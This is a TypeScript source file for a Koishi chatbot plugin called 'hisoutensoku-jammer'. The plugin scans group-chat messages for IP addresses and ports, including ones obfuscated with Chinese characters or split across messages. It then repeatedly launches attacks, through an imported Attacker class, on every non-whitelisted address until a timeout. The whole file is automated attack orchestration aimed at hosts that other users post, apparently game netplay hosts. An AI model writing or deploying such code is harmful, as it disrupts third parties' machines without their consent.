import 'source-map-support/register';
import { Context, Logger, NextFunction, Session, Cache, segment } from 'koishi';
import {
  HisoutensokuJammerPluginConfig,
  HisoutensokuJammerPluginConfigLike,
} from './config';
import {
  KoishiPlugin,
  InjectConfig,
  UseMiddleware,
  InjectLogger,
  Inject,
  UseEvent,
} from 'koishi-thirdeye';
import { Attacker } from './attacker';
import moment from 'moment';
import { chineseCharacterList } from './chinese-replace';
export * from './config';

declare module 'koishi' {
  interface Modules {
    'hisoutensoku-jammer': typeof import('.');
  }
  namespace Cache {
    interface Tables {
      lastMessages: string;
    }
  }
}

const matcherGlobal = /([1-2]? *\d? *\d *)(([^\d][1-2]?\d{1,2}){3}).+?([1-6] *\d *\d *\d *\d)/g;
const matcherSingle = /([1-2]? *\d? *\d *)(([^\d][1-2]?\d{1,2}){3}).+?([1-6] *\d *\d *\d *\d)/;

@KoishiPlugin({
  name: 'hisoutensoku-jammer',
  schema: HisoutensokuJammerPluginConfig,
})
export default class HisoutensokuJammerPlugin {
  constructor(
    private ctx: Context,
    config: HisoutensokuJammerPluginConfigLike,
  ) {}

  @InjectLogger()
  private log: Logger;

  @Inject('cache')
  private cache: Cache;

  @UseEvent('service/cache')
  initializeCacheTable() {
    this.cache.table('lastMessages', { maxAge: 600000 });
  }

  @InjectConfig()
  private config: HisoutensokuJammerPluginConfig;

  @UseMiddleware()
  async onMessage(session: Session, next: NextFunction) {
    this.handleMessage(session.content, session.userId).then();
    return next();
  }

  private combineMessage(message: string) {
    const segmentChain = segment.parse(message);
    const textSegments = segmentChain.filter(
      (segment) => segment.type === 'text',
    );
    return textSegments
      .map((segment) => segment.data.content)
      .join('')
      .trim();
  }

  async handleMessage(message: string, sender: string) {
    let receivedMessage = this.combineMessage(message)
      .split('\n')
      .join(' ')
      .toLowerCase();
    for (const chineseCharacter of chineseCharacterList) {
      receivedMessage = receivedMessage.replace(
        chineseCharacter.characterRegExp,
        chineseCharacter.value,
      );
    }

    const lastMessage = await this.cache.get('lastMessages', sender);
    let messageMatch = receivedMessage.match(matcherGlobal);
    if (lastMessage) {
      receivedMessage = `${lastMessage} ${receivedMessage}`;
      if (!messageMatch) {
        messageMatch = receivedMessage.match(matcherGlobal);
      }
    }
    if (!messageMatch) {
      await this.cache.set('lastMessages', sender, receivedMessage);
      return;
    }
    await this.cache.del('lastMessages', sender);
    const attackPromises = messageMatch.map((pattern) => {
      const patternMatch = pattern.match(matcherSingle);
      const firstDigit = patternMatch[1].replace(/ +/g, '');
      const address = `${firstDigit}.${patternMatch[2]
        .slice(1)
        .split(/[^\d]/)
        .join('.')}`;
      const port = parseInt(patternMatch[4].replace(/ +/g, ''));
      return this.startAttack(address, port);
    });
    const results: boolean[] = await Promise.all(attackPromises);
  }

  async startAttack(address: string, port: number): Promise<boolean> {
    if (this.config.isWhitelisted(address)) {
      this.log.info(`Attack of ${address}:${port} skipped.`);
      return false;
    }
    this.log.info(`Attack of ${address}:${port} started.`);
    const currentTime = moment();
    while (moment().diff(currentTime) <= this.config.attackTimeout) {
      const attacker = new Attacker(address, port, 1000);
      let err;
      try {
        err = await attacker.attack();
      } catch (e) {
        err = `Error: ${e.toString()}`;
      }
      if (err) {
        this.log.warn(`Attack of ${address}:${port} failed: ${err}`);
      } else {
        this.log.info(`Attack of ${address}:${port} succeeded.`);
      }
    }
    this.log.info(`Attack of ${address}:${port} finished.`);
    return true;
  }
}
